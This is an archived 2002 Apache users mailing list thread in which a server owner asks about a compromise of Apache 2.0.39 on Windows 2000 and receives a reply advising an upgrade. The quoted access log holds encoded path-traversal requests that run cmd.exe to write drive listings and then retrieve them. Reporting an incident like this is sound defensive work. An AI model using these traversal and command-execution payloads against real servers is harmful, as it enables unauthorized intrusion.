httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "craig franke" <craig.fra...@harlingen.tstc.edu>
Subject Re: [users@httpd] Security hole with Apache 2.0.39 & Win2K?
Date Thu, 07 Nov 2002 15:55:49 GMT
Not sure if it is a hack... but you should probably upgrade to 2.0.43 unless you have a good
reason not to... I believe there were some vulnerabilities pertaining to Windows in some of
the versions between 2.0.39 and 2.0.43...

Craig

>>> jere@iki.fi 11/07/02 09:31AM >>>

Greetings!

I'm sorry if this is something that has already been discussed, I just 
joined the list. I tried to check out on this matter, but didn't find any 
info elsewhere.

I found some suspicious stuff from my computer. First, there were files 
named dirc.txt...dirg.txt in the root of my C:\ -drive. Plus, there was a 
copy of Windows' cmd.exe renamed as root.exe
The txt files contained the root dir listings for the drives.

Then, I found this from my Apache log:

p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:49 +0300] "GET 
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+c:>>c:\dirc.txt

HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" 
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:52 +0300] "GET 
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+d:>>c:\dird.txt

HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" 
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:53 +0300] "GET 
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+e:>>c:\dire.txt

HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" 
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:55 +0300] "GET 
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+f:>>c:\dirf.txt

HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" 
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:56 +0300] "GET 
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+g:>>c:\dirg.txt

HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" 
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:58 +0300] "GET 
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirc.txt HTTP/1.1" 200 2237 
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:01 +0300] "GET 
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdird.txt HTTP/1.1" 200 0 
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:03 +0300] "GET 
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdire.txt HTTP/1.1" 200 0 
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:05 +0300] "GET 
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirf.txt HTTP/1.1" 200 0 
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:07 +0300] "GET 
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirg.txt HTTP/1.1" 200 0 
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1)"

Then I surfed to the address mentioned in the HTTP request, finding what is 
apparently some pages of a german speaking hacker (cracker?). You can type 
in an IP address and you can see the directory listings for the root drives 
for that machine. Seems it works at least with Apache 2.0.39 and Win2K that 
I'm running. Or was, took it offline when I found this out.

So the question is, what is all this? Have I forgotten some installation 
trick or what? I'm not that worried about the dir listing, but are there 
more harmful things that can be done this way?

No viruses on my computer, I'm running Symantec antivirus, database just 
updated. Also, ZoneAlarm should keep most of the unwanted guests away.

Thanks for any help,
Jere


-- 
Jere Knuuttila      They took one look at me and said, "Oh my god",
jere@iki.fi         get a haircut and get a real job!
+358 50 585 3949                         George Thorogood - Haircut
http://jere.iki.fi 


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org 
   "   from the digest: users-digest-unsubscribe@httpd.apache.org 
For additional commands, e-mail: users-help@httpd.apache.org 


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message